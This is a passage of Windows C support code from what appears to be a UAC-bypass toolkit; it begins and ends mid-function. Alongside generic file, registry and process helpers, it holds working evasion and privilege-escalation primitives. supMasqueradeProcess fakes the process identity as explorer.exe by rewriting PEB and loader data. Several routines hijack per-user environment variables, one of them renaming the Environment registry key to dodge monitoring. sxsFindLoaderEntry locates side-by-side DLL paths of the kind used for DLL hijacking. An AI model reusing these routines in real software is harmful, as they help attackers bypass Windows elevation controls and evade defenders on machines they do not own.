supSetLastErrorFromNtStatus(status);
if (lpType)
*lpType = TokenType;
return (NT_SUCCESS(status));
}
/*
* supWriteBufferToFile
*
* Purpose:
*
* Create new file and write buffer to it.
*
*/
BOOL supWriteBufferToFile(
_In_ LPCWSTR lpFileName,
_In_opt_ PVOID Buffer,
_In_ DWORD BufferSize
)
{
HANDLE hFile;
DWORD bytesIO = 0;
if ((Buffer == NULL) || (BufferSize == 0))
return FALSE;
hFile = CreateFile(lpFileName,
GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL);
if (hFile != INVALID_HANDLE_VALUE) {
WriteFile(hFile, Buffer, BufferSize, &bytesIO, NULL);
CloseHandle(hFile);
}
else {
#ifdef _DEBUG
supDebugPrint(TEXT("CreateFile"), GetLastError());
#endif
return FALSE;
}
return (bytesIO == BufferSize);
}
/*
* supDebugPrint
*
* Purpose:
*
* Write formatted debug output.
*
*/
VOID supDebugPrint(
_In_ LPCWSTR ApiName,
_In_ DWORD status
)
{
HANDLE Heap;
LPWSTR lpBuffer;
SIZE_T sz;
sz = MAX_PATH;
if (ApiName)
sz += _strlen(ApiName);
if (g_ctx == NULL) {
Heap = NtCurrentPeb()->ProcessHeap;
}
else {
Heap = g_ctx->ucmHeap;
}
lpBuffer = (LPWSTR)RtlAllocateHeap(Heap, HEAP_ZERO_MEMORY, sz * sizeof(WCHAR));
if (lpBuffer) {
_strcpy(lpBuffer, TEXT("[UCM] "));
if (ApiName) {
_strcat(lpBuffer, ApiName);
}
_strcat(lpBuffer, TEXT(" code = 0x"));
ultohex(status, _strend(lpBuffer));
_strcat(lpBuffer, TEXT("\n"));
OutputDebugString(lpBuffer);
RtlFreeHeap(Heap, 0, lpBuffer);
}
}
/*
* supRegWriteValue
*
* Purpose:
*
* Write value to the registry.
*
*/
NTSTATUS supRegWriteValue(
_In_ HANDLE hKey,
_In_opt_ LPWSTR ValueName,
_In_ DWORD ValueType,
_In_ PVOID ValueData,
_In_ ULONG ValueDataSize
)
{
UNICODE_STRING usValue;
if (ValueName) {
RtlInitUnicodeString(&usValue, ValueName);
}
else {
RtlInitEmptyUnicodeString(&usValue, NULL, 0);
}
return NtSetValueKey(hKey,
&usValue,
0,
ValueType,
ValueData,
ValueDataSize);
}
/*
* supRegCurrentUserDeleteSubKeyValue
*
* Purpose:
*
* Remove value of the given subkey.
*
*/
NTSTATUS supRegCurrentUserDeleteSubKeyValue(
_In_ LPWSTR SubKey,
_In_ LPWSTR ValueName)
{
NTSTATUS ntStatus;
HANDLE hRootKey = NULL, hSubKey = NULL;
OBJECT_ATTRIBUTES obja;
UNICODE_STRING usSubKey, usValueName, usRootKey;
ntStatus = RtlFormatCurrentUserKeyPath(&usRootKey);
if (NT_SUCCESS(ntStatus)) {
InitializeObjectAttributes(&obja, &usRootKey, OBJ_CASE_INSENSITIVE, NULL, NULL);
ntStatus = NtOpenKey(&hRootKey, MAXIMUM_ALLOWED, &obja);
if (NT_SUCCESS(ntStatus)) {
RtlInitUnicodeString(&usSubKey, SubKey);
obja.RootDirectory = hRootKey;
obja.ObjectName = &usSubKey;
ntStatus = NtOpenKey(&hSubKey, MAXIMUM_ALLOWED, &obja);
if (NT_SUCCESS(ntStatus)) {
RtlInitUnicodeString(&usValueName, ValueName);
ntStatus = NtDeleteValueKey(hSubKey, &usValueName);
NtClose(hSubKey);
}
NtClose(hRootKey);
}
RtlFreeUnicodeString(&usRootKey);
}
return ntStatus;
}
/*
* supRegReadValue
*
* Purpose:
*
* Read given value to output buffer.
* Returned Buffer must be released with RtlFreeHeap after use.
*
*/
NTSTATUS supRegReadValue(
_In_ HANDLE hKey,
_In_ LPWSTR ValueName,
_In_ DWORD ValueType,
_Out_ PVOID* Buffer,
_Out_ ULONG* BufferSize,
_In_opt_ HANDLE hHeap
)
{
KEY_VALUE_PARTIAL_INFORMATION* kvpi;
UNICODE_STRING usName;
NTSTATUS Status = STATUS_UNSUCCESSFUL;
ULONG Length = 0;
PVOID CopyBuffer = NULL;
HANDLE Heap;
*Buffer = NULL;
*BufferSize = 0;
if (hHeap == NULL)
Heap = NtCurrentPeb()->ProcessHeap;
else
Heap = hHeap;
RtlInitUnicodeString(&usName, ValueName);
Status = NtQueryValueKey(hKey, &usName, KeyValuePartialInformation, NULL, 0, &Length);
if (Status == STATUS_BUFFER_TOO_SMALL) {
kvpi = (KEY_VALUE_PARTIAL_INFORMATION*)RtlAllocateHeap(Heap, HEAP_ZERO_MEMORY, Length);
if (kvpi) {
Status = NtQueryValueKey(hKey, &usName, KeyValuePartialInformation, kvpi, Length, &Length);
if (NT_SUCCESS(Status)) {
if (kvpi->Type == ValueType) {
CopyBuffer = RtlAllocateHeap(Heap, HEAP_ZERO_MEMORY, kvpi->DataLength);
if (CopyBuffer) {
RtlCopyMemory(CopyBuffer, kvpi->Data, kvpi->DataLength);
*Buffer = CopyBuffer;
*BufferSize = kvpi->DataLength;
Status = STATUS_SUCCESS;
}
else {
Status = STATUS_NO_MEMORY;
}
}
else {
Status = STATUS_OBJECT_TYPE_MISMATCH;
}
}
RtlFreeHeap(Heap, 0, kvpi);
}
else {
Status = STATUS_NO_MEMORY;
}
}
return Status;
}
/*
* supReadFileToBuffer
*
* Purpose:
*
* Read file to buffer. Release memory when it no longer needed.
*
*/
PBYTE supReadFileToBuffer(
_In_ LPCWSTR lpFileName,
_Inout_opt_ LPDWORD lpBufferSize
)
{
NTSTATUS status;
HANDLE hFile = NULL;
PBYTE Buffer = NULL;
SIZE_T sz = 0;
UNICODE_STRING usName;
OBJECT_ATTRIBUTES attr;
IO_STATUS_BLOCK iost;
FILE_STANDARD_INFORMATION fi;
do {
if (lpFileName == NULL)
return NULL;
if (!RtlDosPathNameToNtPathName_U(lpFileName, &usName, NULL, NULL))
break;
InitializeObjectAttributes(&attr, &usName, OBJ_CASE_INSENSITIVE, 0, NULL);
status = NtCreateFile(
&hFile,
FILE_READ_DATA | SYNCHRONIZE,
&attr,
&iost,
NULL,
FILE_ATTRIBUTE_NORMAL,
FILE_SHARE_READ,
FILE_OPEN,
FILE_NON_DIRECTORY_FILE | FILE_SYNCHRONOUS_IO_NONALERT,
NULL,
0);
RtlFreeUnicodeString(&usName);
if (!NT_SUCCESS(status)) {
break;
}
RtlSecureZeroMemory(&fi, sizeof(fi));
status = NtQueryInformationFile(
hFile,
&iost,
&fi,
sizeof(FILE_STANDARD_INFORMATION),
FileStandardInformation);
if (!NT_SUCCESS(status))
break;
sz = (SIZE_T)fi.EndOfFile.LowPart;
Buffer = (PBYTE)supVirtualAlloc(
&sz,
DEFAULT_ALLOCATION_TYPE,
DEFAULT_PROTECT_TYPE,
&status);
if (NT_SUCCESS(status)) {
status = NtReadFile(
hFile,
NULL,
NULL,
NULL,
&iost,
Buffer,
fi.EndOfFile.LowPart,
NULL,
NULL);
if (NT_SUCCESS(status)) {
if (lpBufferSize)
*lpBufferSize = fi.EndOfFile.LowPart;
}
else {
supVirtualFree(Buffer, NULL);
Buffer = NULL;
}
}
} while (FALSE);
if (hFile != NULL) {
NtClose(hFile);
}
return Buffer;
}
/*
* supRunProcess3
*
* Purpose:
*
* ShellExecuteEx given process with given parameters and return handle to it.
*
*/
HANDLE supRunProcess3(
_In_ LPCWSTR lpFile,
_In_opt_ LPCWSTR lpParameters,
_In_opt_ LPCWSTR lpVerb,
_In_ INT nShow
)
{
SHELLEXECUTEINFO shinfo;
RtlSecureZeroMemory(&shinfo, sizeof(shinfo));
shinfo.cbSize = sizeof(shinfo);
shinfo.fMask = SEE_MASK_FLAG_NO_UI | SEE_MASK_NOCLOSEPROCESS;
shinfo.lpFile = lpFile;
shinfo.lpParameters = lpParameters;
shinfo.nShow = nShow;
shinfo.lpVerb = lpVerb;
if (ShellExecuteEx(&shinfo))
return shinfo.hProcess;
return NULL;
}
/*
* supRunProcess2
*
* Purpose:
*
* Execute given process with given parameters and wait if specified.
*
*/
BOOL supRunProcess2(
_In_ LPCWSTR lpFile,
_In_opt_ LPCWSTR lpParameters,
_In_opt_ LPCWSTR lpVerb,
_In_ INT nShow,
_In_ ULONG mTimeOut
)
{
BOOL bResult = FALSE;
HANDLE hProcess = supRunProcess3(lpFile,
lpParameters,
lpVerb,
nShow);
if (hProcess) {
if (mTimeOut != 0) {
if (WaitForSingleObject(hProcess, mTimeOut) == WAIT_TIMEOUT)
TerminateProcess(hProcess, WAIT_TIMEOUT);
}
CloseHandle(hProcess);
bResult = TRUE;
}
return bResult;
}
/*
* supRunProcess
*
* Purpose:
*
* Execute given process with given parameters.
*
*/
BOOL supRunProcess(
_In_ LPCWSTR lpFile,
_In_opt_ LPCWSTR lpParameters
)
{
return supRunProcess2(lpFile,
lpParameters,
NULL,
SW_SHOW,
SUPRUNPROCESS_TIMEOUT_DEFAULT);
}
/*
* supCopyMemory
*
* Purpose:
*
* Copies bytes between buffers.
*
* dest - Destination buffer
* cbdest - Destination buffer size in bytes
* src - Source buffer
* cbsrc - Source buffer size in bytes
*
*/
void supCopyMemory(
_Inout_ void* dest,
_In_ size_t cbdest,
_In_ const void* src,
_In_ size_t cbsrc
)
{
char* d = (char*)dest;
char* s = (char*)src;
if ((dest == 0) || (src == 0) || (cbdest == 0))
return;
if (cbdest < cbsrc)
cbsrc = cbdest;
while (cbsrc > 0) {
*d++ = *s++;
cbsrc--;
}
}
/*
* supQueryEnvironmentVariableOffset
*
* Purpose:
*
* Return offset to the given environment variable.
*
*/
LPWSTR supQueryEnvironmentVariableOffset(
_In_ PUNICODE_STRING Value
)
{
UNICODE_STRING str1;
PWCHAR EnvironmentBlock, ptr;
EnvironmentBlock = (PWCHAR)RtlGetCurrentPeb()->ProcessParameters->Environment;
ptr = EnvironmentBlock;
do {
if (*ptr == 0)
return 0;
RtlInitUnicodeString(&str1, ptr);
if (RtlPrefixUnicodeString(Value, &str1, TRUE))
break;
ptr += _strlen(ptr) + 1;
} while (1);
return (ptr + Value->Length / sizeof(WCHAR));
}
/*
* supChkSum
*
* Purpose:
*
* Calculate partial checksum for given buffer.
*
*/
USHORT supChkSum(
ULONG PartialSum,
PUSHORT Source,
ULONG Length
)
{
while (Length--) {
PartialSum += *Source++;
PartialSum = (PartialSum >> 16) + (PartialSum & 0xffff);
}
return (USHORT)(((PartialSum >> 16) + PartialSum) & 0xffff);
}
/*
* supCalculateCheckSumForMappedFile
*
* Purpose:
*
* Calculate PE file checksum.
*
*/
DWORD supCalculateCheckSumForMappedFile(
_In_ PVOID BaseAddress,
_In_ ULONG FileLength
)
{
PUSHORT AdjustSum;
PIMAGE_NT_HEADERS NtHeaders;
USHORT PartialSum;
ULONG CheckSum;
PartialSum = supChkSum(0, (PUSHORT)BaseAddress, (FileLength + 1) >> 1);
NtHeaders = RtlImageNtHeader(BaseAddress);
if (NtHeaders != NULL) {
AdjustSum = (PUSHORT)(&NtHeaders->OptionalHeader.CheckSum);
PartialSum -= (PartialSum < AdjustSum[0]);
PartialSum -= AdjustSum[0];
PartialSum -= (PartialSum < AdjustSum[1]);
PartialSum -= AdjustSum[1];
}
else
{
PartialSum = 0;
}
CheckSum = (ULONG)PartialSum + FileLength;
return CheckSum;
}
/*
* supVerifyMappedImageMatchesChecksum
*
* Purpose:
*
* Calculate PE file checksum and compare it with checksum in PE header.
*
*/
BOOLEAN supVerifyMappedImageMatchesChecksum(
_In_ PVOID BaseAddress,
_In_ ULONG FileLength
)
{
PIMAGE_NT_HEADERS NtHeaders;
ULONG HeaderSum;
ULONG CheckSum;
CheckSum = supCalculateCheckSumForMappedFile(BaseAddress, FileLength);
NtHeaders = RtlImageNtHeader(BaseAddress);
if (NtHeaders) {
HeaderSum = NtHeaders->OptionalHeader.CheckSum;
}
else {
HeaderSum = FileLength;
}
return (CheckSum == HeaderSum);
}
/*
* supSetCheckSumForMappedFile
*
* Purpose:
*
* Set checksum value to PE header.
*
*/
BOOLEAN supSetCheckSumForMappedFile(
_In_ PVOID BaseAddress,
_In_ ULONG CheckSum
)
{
PIMAGE_NT_HEADERS NtHeaders;
NtHeaders = RtlImageNtHeader(BaseAddress);
if (NtHeaders) {
NtHeaders->OptionalHeader.CheckSum = CheckSum;
return TRUE;
}
return FALSE;
}
/*
* supLdrQueryResourceDataEx
*
* Purpose:
*
* Load resource by given id (win32 FindResource, SizeofResource, LockResource).
*
*/
NTSTATUS supLdrQueryResourceDataEx(
_In_ ULONG_PTR ResourceId,
_In_ PVOID DllHandle,
_Out_ PULONG DataSize,
_Out_ PVOID* Data
)
{
NTSTATUS status;
ULONG_PTR IdPath[3];
IMAGE_RESOURCE_DATA_ENTRY* DataEntry;
ULONG SizeOfData = 0;
if (DataSize)
*DataSize = 0;
if (DllHandle == NULL) {
return STATUS_INVALID_PARAMETER_2;
}
IdPath[0] = (ULONG_PTR)RT_RCDATA; //type
IdPath[1] = ResourceId; //id
IdPath[2] = 0; //lang
status = LdrFindResource_U(DllHandle, (ULONG_PTR*)&IdPath, 3, &DataEntry);
if (NT_SUCCESS(status)) {
status = LdrAccessResource(DllHandle, DataEntry, Data, &SizeOfData);
if (NT_SUCCESS(status)) {
if (DataSize) {
*DataSize = SizeOfData;
}
}
}
return status;
}
/*
* supLdrQueryResourceData
*
* Purpose:
*
* Load resource by given id (win32 FindResource, SizeofResource, LockResource).
*
*/
PBYTE supLdrQueryResourceData(
_In_ ULONG_PTR ResourceId,
_In_ PVOID DllHandle,
_Out_ PULONG DataSize
)
{
NTSTATUS status;
PBYTE Data = NULL;
status = supLdrQueryResourceDataEx(ResourceId,
DllHandle,
DataSize,
&Data);
if (NT_SUCCESS(status))
return Data;
return NULL;
}
/*
* supSetLastErrorFromNtStatus
*
* Purpose:
*
* Convert last error.
*
*/
VOID supSetLastErrorFromNtStatus(
_In_ NTSTATUS LastNtStatus
)
{
DWORD dwErrorCode;
#ifdef _WIN64
dwErrorCode = RtlNtStatusToDosErrorNoTeb(LastNtStatus);
#else
dwErrorCode = RtlNtStatusToDosError(LastNtStatus);
#endif
SetLastError(dwErrorCode);
}
static PWSTR g_lpszExplorer = NULL;
typedef struct _LDR_BACKUP {
PWSTR ImagePathName;
PWSTR CommandLine;
PWSTR lpFullDllName;
PWSTR lpBaseDllName;
} LDR_BACKUP, * PLDR_BACKUP;
static LDR_BACKUP g_LdrBackup;
/*
* supxLdrEnumModulesCallback
*
* Purpose:
*
* LdrEnumerateLoadedModules callback.
*
*/
VOID NTAPI supxLdrEnumModulesCallback(
_In_ PCLDR_DATA_TABLE_ENTRY DataTableEntry,
_In_ PVOID Context,
_Inout_ BOOLEAN* StopEnumeration
)
{
PPEB Peb = NtCurrentPeb();
PWSTR FullDllName, BaseDllName;
BOOL Restore = PtrToInt(Context);
if (DataTableEntry->DllBase == Peb->ImageBaseAddress) {
if (Restore) {
FullDllName = g_LdrBackup.lpFullDllName;
BaseDllName = g_LdrBackup.lpBaseDllName;
}
else {
g_LdrBackup.lpBaseDllName = DataTableEntry->BaseDllName.Buffer;
g_LdrBackup.lpFullDllName = DataTableEntry->FullDllName.Buffer;
FullDllName = g_lpszExplorer;
BaseDllName = EXPLORER_EXE;
}
RtlInitUnicodeString(&DataTableEntry->FullDllName, FullDllName);
RtlInitUnicodeString(&DataTableEntry->BaseDllName, BaseDllName);
*StopEnumeration = TRUE;
}
else {
*StopEnumeration = FALSE;
}
}
/*
* supMasqueradeProcess
*
* Purpose:
*
* Fake/Restore current process information.
*
*/
VOID supMasqueradeProcess(
_In_ BOOL Restore
)
{
NTSTATUS Status;
PPEB Peb = NtCurrentPeb();
SIZE_T RegionSize;
PWSTR ImageFileName, CommandLine;
if (Restore == FALSE) {
g_lpszExplorer = NULL;
RegionSize = PAGE_SIZE;
Status = NtAllocateVirtualMemory(
NtCurrentProcess(),
(PVOID*)&g_lpszExplorer,
0,
&RegionSize,
MEM_COMMIT | MEM_RESERVE,
PAGE_READWRITE);
if (NT_SUCCESS(Status)) {
_strcpy(g_lpszExplorer, g_ctx->szSystemRoot);
_strcat(g_lpszExplorer, EXPLORER_EXE);
}
else {
supSetLastErrorFromNtStatus(Status);
return;
}
}
RtlAcquirePebLock();
if (Restore) {
CommandLine = g_LdrBackup.CommandLine;
ImageFileName = g_LdrBackup.ImagePathName;
}
else {
g_LdrBackup.ImagePathName = Peb->ProcessParameters->ImagePathName.Buffer;
g_LdrBackup.CommandLine = Peb->ProcessParameters->CommandLine.Buffer;
ImageFileName = g_lpszExplorer;
CommandLine = EXPLORER_EXE;
}
RtlInitUnicodeString(&Peb->ProcessParameters->ImagePathName, ImageFileName);
RtlInitUnicodeString(&Peb->ProcessParameters->CommandLine, CommandLine);
if (Restore) {
RegionSize = 0;
NtFreeVirtualMemory(
NtCurrentProcess(),
(PVOID*)&g_lpszExplorer,
&RegionSize,
MEM_RELEASE);
g_lpszExplorer = NULL;
}
RtlReleasePebLock();
LdrEnumerateLoadedModules(0, &supxLdrEnumModulesCallback, IntToPtr(Restore));
}
/*
* supExpandEnvironmentStrings
*
* Purpose:
*
* Native ExpandEnvironmetStrings.
*
*/
DWORD supExpandEnvironmentStrings(
_In_ LPCWSTR lpSrc,
_In_ LPWSTR lpDst,
_In_ DWORD nSize
)
{
NTSTATUS Status;
UNICODE_STRING Source, Destination;
ULONG Length;
DWORD iSize;
if (nSize > (MAXUSHORT >> 1) - 2) {
iSize = (MAXUSHORT >> 1) - 2;
}
else {
iSize = nSize;
}
RtlInitUnicodeString(&Source, lpSrc);
Destination.Buffer = lpDst;
Destination.Length = 0;
Destination.MaximumLength = (USHORT)(iSize * sizeof(WCHAR));
Length = 0;
Status = RtlExpandEnvironmentStrings_U(NULL,
&Source,
&Destination,
&Length
);
if (NT_SUCCESS(Status) || Status == STATUS_BUFFER_TOO_SMALL) {
return (DWORD)(Length / sizeof(WCHAR));
}
else {
supSetLastErrorFromNtStatus(Status);
return 0;
}
}
/*
* sxsFilePathNoSlash
*
* Purpose:
*
* same as _filepath except it doesnt return last slash.
*
*/
wchar_t* sxsFilePathNoSlash(
const wchar_t* fname,
wchar_t* fpath
)
{
wchar_t* p = (wchar_t*)fname, * p0 = (wchar_t*)fname, * p1 = (wchar_t*)fpath;
if ((fname == 0) || (fpath == NULL))
return 0;
while (*fname != (wchar_t)0) {
if (*fname == '\\')
p = (wchar_t*)fname;
fname++;
}
while (p0 < p) {
*p1 = *p0;
p1++;
p0++;
}
*p1 = 0;
return fpath;
}
/*
* sxsFindLoaderEntry
*
* Purpose:
*
* Return loader entry filename for sxs dll.
*
*/
BOOL sxsFindLoaderEntry(
_In_ PSXS_SEARCH_CONTEXT Context
)
{
NTSTATUS Status;
HANDLE hDll = NULL;
UNICODE_STRING usDll;
PLDR_DATA_TABLE_ENTRY LdrTableEntry = NULL;
RtlInitUnicodeString(&usDll, Context->DllName);
Status = LdrGetDllHandle(
NULL,
NULL,
&usDll,
&hDll);
if (NT_SUCCESS(Status)) {
Status = LdrFindEntryForAddress(
hDll,
&LdrTableEntry);
if (NT_SUCCESS(Status)) {
if (_strstri(
LdrTableEntry->FullDllName.Buffer,
L".local") == NULL)
{
if (_strstri(
LdrTableEntry->FullDllName.Buffer,
Context->SxsKey))
{
sxsFilePathNoSlash(
LdrTableEntry->FullDllName.Buffer,
Context->FullDllPath);
}
else
Status = STATUS_NOT_FOUND;
}
else
Status = STATUS_TOO_LATE;
}
}
return NT_SUCCESS(Status);
}
/*
* supxDeleteKeyRecursive
*
* Purpose:
*
* Delete key and all it subkeys/values.
*
*/
BOOL supxDeleteKeyRecursive(
_In_ HKEY hKeyRoot,
_In_ LPWSTR lpSubKey)
{
LPWSTR lpEnd;
LONG lResult;
DWORD dwSize;
WCHAR szName[MAX_PATH + 1];
HKEY hKey;
FILETIME ftWrite;
//
// Attempt to delete key as is.
//
lResult = RegDeleteKey(hKeyRoot, lpSubKey);
if (lResult == ERROR_SUCCESS)
return TRUE;
//
// Try to open key to check if it exist.
//
lResult = RegOpenKeyEx(hKeyRoot, lpSubKey, 0, KEY_READ, &hKey);
if (lResult != ERROR_SUCCESS) {
if (lResult == ERROR_FILE_NOT_FOUND)
return TRUE;
else
return FALSE;
}
//
// Add slash to the key path if not present.
//
lpEnd = _strend(lpSubKey);
if (*(lpEnd - 1) != TEXT('\\')) {
*lpEnd = TEXT('\\');
lpEnd++;
*lpEnd = TEXT('\0');
}
//
// Enumerate subkeys and call this func for each.
//
dwSize = MAX_PATH;
lResult = RegEnumKeyEx(hKey, 0, szName, &dwSize, NULL,
NULL, NULL, &ftWrite);
if (lResult == ERROR_SUCCESS) {
do {
_strncpy(lpEnd, MAX_PATH, szName, MAX_PATH);
if (!supxDeleteKeyRecursive(hKeyRoot, lpSubKey))
break;
dwSize = MAX_PATH;
lResult = RegEnumKeyEx(hKey, 0, szName, &dwSize, NULL,
NULL, NULL, &ftWrite);
} while (lResult == ERROR_SUCCESS);
}
lpEnd--;
*lpEnd = TEXT('\0');
RegCloseKey(hKey);
//
// Delete current key, all it subkeys should be already removed.
//
lResult = RegDeleteKey(hKeyRoot, lpSubKey);
if (lResult == ERROR_SUCCESS)
return TRUE;
return FALSE;
}
/*
* supRegDeleteKeyRecursive
*
* Purpose:
*
* Delete key and all it subkeys/values.
*
* Remark:
*
* SubKey should not be longer than 260 chars.
*
*/
BOOL supRegDeleteKeyRecursive(
_In_ HKEY hKeyRoot,
_In_ LPCWSTR lpSubKey)
{
WCHAR szKeyName[MAX_PATH * 2];
RtlSecureZeroMemory(szKeyName, sizeof(szKeyName));
_strncpy(szKeyName, MAX_PATH * 2, lpSubKey, MAX_PATH);
return supxDeleteKeyRecursive(hKeyRoot, szKeyName);
}
/*
* supSetEnvVariableEx
*
* Purpose:
*
* Remove or set current user environment variable (NTAPI variant).
*
*/
BOOL supSetEnvVariableEx(
_In_ BOOL fRemove,
_In_opt_ LPWSTR lpKeyName,
_In_ LPCWSTR lpVariableName,
_In_opt_ LPCWSTR lpVariableData
)
{
BOOL bNameAllocated = FALSE;
DWORD cbData;
NTSTATUS ntStatus = STATUS_UNSUCCESSFUL;
LPWSTR lpSubKey;
HANDLE hRoot = NULL, hSubKey = NULL;
OBJECT_ATTRIBUTES obja;
UNICODE_STRING usRootKey, usSubKey, usValueName;
usRootKey.Buffer = NULL;
do {
if (lpVariableName == NULL) {
//
// Nothing to set/remove.
//
break;
}
if ((lpVariableData == NULL) && (fRemove == FALSE))
break;
if (lpKeyName == NULL)
lpSubKey = L"Environment";
else
lpSubKey = lpKeyName;
ntStatus = RtlFormatCurrentUserKeyPath(&usRootKey);
if (!NT_SUCCESS(ntStatus))
break;
bNameAllocated = TRUE;
InitializeObjectAttributes(&obja, &usRootKey, OBJ_CASE_INSENSITIVE, NULL, NULL);
ntStatus = NtOpenKey(&hRoot, MAXIMUM_ALLOWED, &obja);
if (!NT_SUCCESS(ntStatus))
break;
RtlInitUnicodeString(&usSubKey, lpSubKey);
obja.RootDirectory = hRoot;
obja.ObjectName = &usSubKey;
ntStatus = NtOpenKey(&hSubKey, MAXIMUM_ALLOWED, &obja);
if (!NT_SUCCESS(ntStatus))
break;
RtlInitUnicodeString(&usValueName, lpVariableName);
if (fRemove) {
ntStatus = NtDeleteValueKey(hSubKey, &usValueName);
}
else {
cbData = (DWORD)((1 + _strlen(lpVariableData)) * sizeof(WCHAR));
ntStatus = NtSetValueKey(hSubKey,
&usValueName,
0,
REG_SZ,
(BYTE*)lpVariableData,
cbData);
}
if (NT_SUCCESS(ntStatus)) {
SendMessageTimeout(HWND_BROADCAST,
WM_SETTINGCHANGE,
0,
(LPARAM)lpVariableName,
SMTO_BLOCK,
1000,
NULL);
}
} while (FALSE);
if (hSubKey) NtClose(hSubKey);
if (hRoot) NtClose(hRoot);
if (bNameAllocated)
RtlFreeUnicodeString(&usRootKey);
return NT_SUCCESS(ntStatus);
}
/*
* supSetEnvVariable
*
* Purpose:
*
* Remove or set current user environment variable.
*
*/
BOOL supSetEnvVariable(
_In_ BOOL fRemove,
_In_opt_ LPWSTR lpKeyName,
_In_ LPCWSTR lpVariableName,
_In_opt_ LPCWSTR lpVariableData
)
{
BOOL bResult = FALSE;
HKEY hKey = NULL;
DWORD cbData;
LPWSTR lpSubKey;
do {
if (lpVariableName == NULL)
break;
if (lpKeyName == NULL)
lpSubKey = L"Environment";
else
lpSubKey = lpKeyName;
if ((lpVariableData == NULL) && (fRemove == FALSE))
break;
if (RegOpenKey(HKEY_CURRENT_USER, lpSubKey, &hKey) != ERROR_SUCCESS)
break;
if (fRemove) {
bResult = (RegDeleteValue(hKey, lpVariableName) == ERROR_SUCCESS);
}
else {
cbData = (DWORD)((1 + _strlen(lpVariableData)) * sizeof(WCHAR));
bResult = (RegSetValueEx(hKey, lpVariableName, 0, REG_SZ,
(BYTE*)lpVariableData, cbData) == ERROR_SUCCESS);
}
if (bResult) {
SendMessageTimeout(HWND_BROADCAST,
WM_SETTINGCHANGE,
0,
(LPARAM)lpVariableName,
SMTO_BLOCK,
1000,
NULL);
}
} while (FALSE);
if (hKey != NULL) {
RegFlushKey(hKey);
RegCloseKey(hKey);
}
return bResult;
}
/*
* supSetEnvVariable
*
* Purpose:
*
* Remove or set current user environment variable.
*
*/
BOOL supSetEnvVariable2(
_In_ BOOL fRemove,
_In_opt_ LPWSTR lpKeyName,
_In_ LPCWSTR lpVariableName,
_In_opt_ LPCWSTR lpVariableData
)
{
BOOL bResult = FALSE;
HKEY hKey = NULL;
DWORD cbData;
LPWSTR lpSubKey;
LARGE_INTEGER liValue;
ULONG seedValue;
WCHAR szNewKey[MAX_PATH];
do {
if (lpVariableName == NULL)
break;
if (lpKeyName == NULL)
lpSubKey = L"Environment";
else
lpSubKey = lpKeyName;
if ((lpVariableData == NULL) && (fRemove == FALSE))
break;
RtlSecureZeroMemory(&szNewKey, sizeof(szNewKey));
seedValue = GetTickCount();
liValue.LowPart = RtlRandomEx(&seedValue);
seedValue = ~GetTickCount();
liValue.HighPart = RtlRandomEx(&seedValue);
supBinTextEncode(liValue.QuadPart, szNewKey);
if (ERROR_SUCCESS == RegRenameKey(HKEY_CURRENT_USER, lpSubKey, szNewKey)) {
if (ERROR_SUCCESS == RegOpenKey(HKEY_CURRENT_USER, szNewKey, &hKey)) {
if (fRemove) {
bResult = (RegDeleteValue(hKey, lpVariableName) == ERROR_SUCCESS);
}
else {
cbData = (DWORD)((1 + _strlen(lpVariableData)) * sizeof(WCHAR));
bResult = (RegSetValueEx(hKey, lpVariableName, 0, REG_SZ,
(BYTE*)lpVariableData, cbData) == ERROR_SUCCESS);
}
RegFlushKey(hKey);
RegCloseKey(hKey);
hKey = NULL;
}
RegRenameKey(HKEY_CURRENT_USER, szNewKey, lpSubKey);
}
if (bResult) {
SendMessageTimeout(HWND_BROADCAST,
WM_SETTINGCHANGE,
0,
(LPARAM)lpVariableName,
SMTO_BLOCK,
1000,
NULL);
}
} while (FALSE);
if (hKey != NULL) {
RegFlushKey(hKey);
RegCloseKey(hKey);
}
return bResult;
}
/*
* supReplaceEnvironmentVariableValue
*
* Purpose:
*
* Replace/Restore environment variable value.
*
*/
_Success_(return)
BOOL supReplaceEnvironmentVariableValue(
_In_opt_ LPWSTR lpKeyName,
_In_ LPWSTR lpVariableName,
_In_ DWORD dwType,
_In_opt_ LPWSTR lpVariableData,
_Out_opt_ PVOID *lpOldVariableData
)
{
BOOL bNameAllocated = FALSE, bDoBackup = (lpOldVariableData != NULL);
DWORD cbData;
NTSTATUS ntStatus = STATUS_UNSUCCESSFUL;
LPWSTR lpSubKey;
HANDLE hRoot = NULL, hSubKey = NULL;
OBJECT_ATTRIBUTES obja;
UNICODE_STRING usRootKey, usSubKey, usValueName;
usRootKey.Buffer = NULL;
do {
if (lpVariableName == NULL) {
//
// Nothing to replace.
//
break;
}
if (lpVariableData == NULL)
break;
if (lpKeyName == NULL)
lpSubKey = L"Environment";
else
lpSubKey = lpKeyName;
ntStatus = RtlFormatCurrentUserKeyPath(&usRootKey);
if (!NT_SUCCESS(ntStatus))
break;
bNameAllocated = TRUE;
InitializeObjectAttributes(&obja, &usRootKey, OBJ_CASE_INSENSITIVE, NULL, NULL);
ntStatus = NtOpenKey(&hRoot, MAXIMUM_ALLOWED, &obja);
if (!NT_SUCCESS(ntStatus))
break;
RtlInitUnicodeString(&usSubKey, lpSubKey);
obja.RootDirectory = hRoot;
obja.ObjectName = &usSubKey;
ntStatus = NtOpenKey(&hSubKey, MAXIMUM_ALLOWED, &obja);
if (!NT_SUCCESS(ntStatus))
break;
RtlInitUnicodeString(&usValueName, lpVariableName);
if (bDoBackup) {
cbData = 0;
//
// Read value, failure is not critical, value may not present.
//
supRegReadValue(hSubKey,
lpVariableName,
dwType,
lpOldVariableData,
&cbData,
g_ctx->ucmHeap);
}
cbData = (DWORD)((1 + _strlen(lpVariableData)) * sizeof(WCHAR));
ntStatus = NtSetValueKey(hSubKey,
&usValueName,
0,
dwType,
(BYTE*)lpVariableData,
cbData);
if (NT_SUCCESS(ntStatus)) {
SendMessageTimeout(HWND_BROADCAST,
WM_SETTINGCHANGE,
0,
(LPARAM)lpVariableName,
SMTO_BLOCK,
1000,
NULL);
}
} while (FALSE);
if (hSubKey) NtClose(hSubKey);
if (hRoot) NtClose(hRoot);
if (bNameAllocated)
RtlFreeUnicodeString(&usRootKey);
return NT_SUCCESS(ntStatus);
}
/*
* supDeleteMountPoint
*
* Purpose:
*
* Removes reparse point of type mount_point.
*
*/
BOOL supDeleteMountPoint(
_In_ HANDLE hDirectory
)
{
NTSTATUS status;
IO_STATUS_BLOCK IoStatusBlock;
REPARSE_GUID_DATA_BUFFER Buffer;
RtlSecureZeroMemory(&Buffer, sizeof(REPARSE_GUID_DATA_BUFFER));
Buffer.ReparseTag = IO_REPARSE_TAG_MOUNT_POINT;
